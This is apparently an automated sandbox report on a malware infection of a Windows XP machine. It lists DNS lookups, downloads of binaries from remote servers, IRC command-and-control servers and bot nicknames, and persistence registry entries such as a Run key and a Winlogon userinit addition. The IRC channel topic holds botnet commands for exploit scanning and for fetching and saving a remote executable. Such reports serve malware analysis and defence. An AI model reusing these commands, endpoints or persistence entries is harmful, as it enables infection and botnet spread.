Host Name IP Address
0 127.0.0.1
193.104.27.98 193.104.27.98
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1043
Send Datagram: 2 packet(s) of size 1
Recv Datagram: 2 packet(s) of size 1
Download URLs
http://193.104.27.98/2krn.bin (193.104.27.98)
Outgoing connection to remote server: 193.104.27.98 TCP port 80
DNS Lookup
Host Name IP Address
dell-d3e62f7e26 10.1.11.2
10.1.11.1 10.1.11.1
wpad
193.104.27.98 193.104.27.98
193.104.27.107 193.104.27.107
Opened listening TCP connection on port: 33261
Download URLs
http://193.104.27.98/fox.bin (193.104.27.98)
Outgoing connection to remote server: 193.104.27.98 TCP port 80
Outgoing connection to remote server: 193.104.27.98 TCP port 80
Outgoing connection to remote server: 193.104.27.98 TCP port 80
Outgoing connection to remote server: 193.104.27.98 TCP port 80
Outgoing connection to remote server: 193.104.27.107 TCP port 443
DNS Lookup
Host Name IP Address
0 127.0.0.1
193.104.27.98 193.104.27.98
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1049
Send Datagram: 6 packet(s) of size 1
Recv Datagram: 6 packet(s) of size 1
Download URLs
http://193.104.27.98/2krn.bin (193.104.27.98)
Outgoing connection to remote server: 193.104.27.98 TCP port 80
DNS Lookup
Host Name IP Address
0 127.0.0.1
193.104.27.98 193.104.27.98
dell-d3e62f7e26 10.1.11.2
asp.ukbues.su 69.42.218.70
asp.thand.su 216.246.35.173
fr.thand.su
fr.thand.su 67.214.175.92
www.cooleasy.com
www.cooleasy.com 218.5.74.190
fr.ukbues.su
fr.ukbues.su 67.214.175.92
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1051
Send Datagram: 98 packet(s) of size 1
Recv Datagram: 98 packet(s) of size 1
Download URLs
http://193.104.27.98/2krn.bin (193.104.27.98)
http://67.214.175.92/n.php (fr.thand.su)
http://67.214.175.92/n.php (fr.thand.su)
http://67.214.175.92/?path=n.php%3f (fr.thand.su)
http://67.214.175.92/?path=n.php%3f (fr.thand.su)
http://67.214.175.92/?path=n.php%3f (fr.thand.su)
http://218.5.74.190/azenv.php/n.php (www.cooleasy.com)
http://218.5.74.190/azenv.php/n.php (www.cooleasy.com)
http://67.214.175.92/n.php (fr.thand.su)
http://67.214.175.92/n.php (fr.thand.su)
http://67.214.175.92/?path=n.php%3f (fr.thand.su)
http://67.214.175.92/?path=n.php%3f (fr.thand.su)
Outgoing connection to remote server: 193.104.27.98 TCP port 80
* C&C Server: 69.42.218.70:1863
* Server Password:
* Username: SP3-999
* Nickname: [N00_DEU_XP_0783627]¨â@
* Channel: (Password: )
* Channeltopic:
* C&C Server: 216.246.35.173:1863
* Server Password:
* Username: SP3-581
* Nickname: [00_DEU_XP_4310044]
* Channel: #hitman (Password: open)
* Channeltopic: :.asc -S|.http http://rapidshare.com/files/335701706/uhit|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://78.159.127.253/5050.exe C:bauh.exe 1
Outgoing connection to remote server: fr.thand.su TCP port 80
Outgoing connection to remote server: fr.thand.su TCP port 80
Outgoing connection to remote server: fr.thand.su TCP port 80
Outgoing connection to remote server: fr.thand.su TCP port 80
Outgoing connection to remote server: fr.thand.su TCP port 80
Outgoing connection to remote server: www.cooleasy.com TCP port 80
Outgoing connection to remote server: www.cooleasy.com TCP port 80
Outgoing connection to remote server: fr.thand.su TCP port 80
Outgoing connection to remote server: fr.thand.su TCP port 80
Outgoing connection to remote server: fr.thand.su TCP port 80
Outgoing connection to remote server: fr.thand.su TCP port 80
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Microsoft Driver Setup” = C:WINDOWSupdatd7.exe
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerRun “Microsoft Driver Setup” = C:WINDOWSupdatd7.exe
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{3039636B-5F3D-6C64-6675-696870667265}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{33373039-3132-3864-6B30-303233343434}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{6E633338-267E-2A79-6830-386668666866}” = [REG_BINARY, size: 4 bytes]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfg “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfgtraceIdentifier “Guid” = 5f31090b-d990-4e91-b16d-46121d0255aa
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappcfgtraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxy “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxytraceIdentifier “Guid” = 5f31090b-d990-4e91-b16d-46121d0255aa
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosofteappprxytraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “LogSessionName” = [REG_EXPAND_SZ, value: stdout]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “Active” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtil “ControlFlags” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtiltraceIdentifier “Guid” = 8aefce96-4618-42ff-a057-3536aa78233e
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionTracingMicrosoftQUtiltraceIdentifier “BitNames” = Error Unusual Info Debug
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “EventMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryCount” = [REG_DWORD, value: 00000010]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “TypesSupported” = [REG_DWORD, value: 00000007]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{9D719E4E-0E1B-FC8C-68A6-E16CED23FACC} “{3039636B-5F3D-6C64-6675-696870667265}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{9D719E4E-0E1B-FC8C-68A6-E16CED23FACC} “{33373039-3132-3864-6B30-303233343434}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{9D719E4E-0E1B-FC8C-68A6-E16CED23FACC} “{6E633338-267E-2A79-6830-386668666866}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{3039636B-5F3D-6C64-6675-696870667265}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{33373039-3132-3864-6B30-303233343434}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{6E633338-267E-2A79-6830-386668666866}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{3039636B-5F3D-6C64-6675-696870667265}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{33373039-3132-3864-6B30-303233343434}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{6E633338-267E-2A79-6830-386668666866}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{19127AD2-394B-70F5-C650-B97867BAA1F7} “{23343233-2C66-3B33-3432-343233343233}” = [REG_BINARY, size: 4 bytes]
HKEY_CURRENT_USERSoftwareMicrosoft “” = [REG_DWORD, value: 00000001]
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “userinit” = C:WINDOWSsystem32userinit.exe,C:WINDOWSsystem32sdra64.exe,
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “EventMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryCount” = [REG_DWORD, value: 00000010]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “TypesSupported” = [REG_DWORD, value: 00000007]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “EventMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryCount” = [REG_DWORD, value: 00000010]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “TypesSupported” = [REG_DWORD, value: 00000007]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “EventMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryCount” = [REG_DWORD, value: 00000010]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “TypesSupported” = [REG_DWORD, value: 00000007]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “EventMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryCount” = [REG_DWORD, value: 00000010]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “TypesSupported” = [REG_DWORD, value: 00000007]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “EventMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryCount” = [REG_DWORD, value: 00000010]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “TypesSupported” = [REG_DWORD, value: 00000007]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “EventMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryMessageFile” = [REG_EXPAND_SZ, value: C:WINDOWSsystem32ESENT.dll]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “CategoryCount” = [REG_DWORD, value: 00000010]
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesEventlogApplicationESENT “TypesSupported” = [REG_DWORD, value: 00000007]
Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfile “EnableFirewall”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptography “MachineGuid”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{33373039-3132-3864-6B30-303233343434}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{21212130-2D30-3D39-2D30-3D3233343334}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{33323038-2829-5F2A-3039-333033333333}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{6E633338-267E-2A79-6830-386668666866}”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesssvchostDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalDEBUG “Trace Level”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlNetwork{4D36E972-E325-11CE-BFC1-08002BE10318}{5D19E473-BE30-416B-B5C7-D8A091C41D2F}Connection “Name”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{9D719E4E-0E1B-FC8C-68A6-E16CED23FACC} “{33373039-3132-3864-6B30-303233343434}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{9D719E4E-0E1B-FC8C-68A6-E16CED23FACC} “{21212130-2D30-3D39-2D30-3D3233343334}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{9D719E4E-0E1B-FC8C-68A6-E16CED23FACC} “{33323038-2829-5F2A-3039-333033333333}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{9D719E4E-0E1B-FC8C-68A6-E16CED23FACC} “{6E633338-267E-2A79-6830-386668666866}”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{33373039-3132-3864-6B30-303233343434}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{21212130-2D30-3D39-2D30-3D3233343334}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{33323038-2829-5F2A-3039-333033333333}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{6E633338-267E-2A79-6830-386668666866}”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “DefaultLaunchPermission”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “MachineLaunchRestriction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “MachineAccessRestriction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “ActivationFailureLoggingLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “CallFailureLoggingLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “InvalidSecurityDescriptorLoggingLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “DisableActivationSecurityCheck”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpc “DCOM Security”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “EnableDCOM”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “EnableDCOMHTTP”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “IgnoreServerExceptions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “BreakOnSilencedServerExceptions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacyAuthenticationService”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacyAuthenticationLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacyImpersonationLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacyMutualAuthentication”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “LegacySecureReferences”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “UseSharedWowVDM”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “MaxActivationRetriesPerServer”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle “PreferUnsecureActivation”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “AllowMultipleTSSessions”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlTerminal ServerLicensing Core “EnableConcurrentSessions”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} “{3039636B-5F3D-6C64-6675-696870667265}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{DBE712F1-D373-9699-3F49-FF4DB6C2241A} “{3039636B-5F3D-6C64-6675-696870667265}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{33373039-3132-3864-6B30-303233343434}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{21212130-2D30-3D39-2D30-3D3233343334}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{33323038-2829-5F2A-3039-333033333333}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{35106240-D2F0-DB35-716E-127EB80A0299} “{6E633338-267E-2A79-6830-386668666866}”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesRDPNPNetworkProvider “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesWebClientNetworkProvider “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ServiceslanmanworkstationNetworkProvider “Name”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{19127AD2-394B-70F5-C650-B97867BAA1F7} “{38303964-736C-6666-7364-667364666767}”
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorer{19127AD2-394B-70F5-C650-B97867BAA1F7} “{21323133-4B4A-686E-646B-6D6E69686A64}”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “10”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSecurityProviders “SecurityProviders”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsapsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachedigest.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Name”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Comment”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Capabilities”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “RpcId”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Version”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “Type”
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsaSspiCachemsnsspc.dll “TokenSize”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionNetwork “UID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptography “MachineGuid”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon “userinit”
“GlobalFlags”
“Columns”
“Level”
“Flags”
“LogDir”
“LogFile”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalDEBUG “Trace Level”
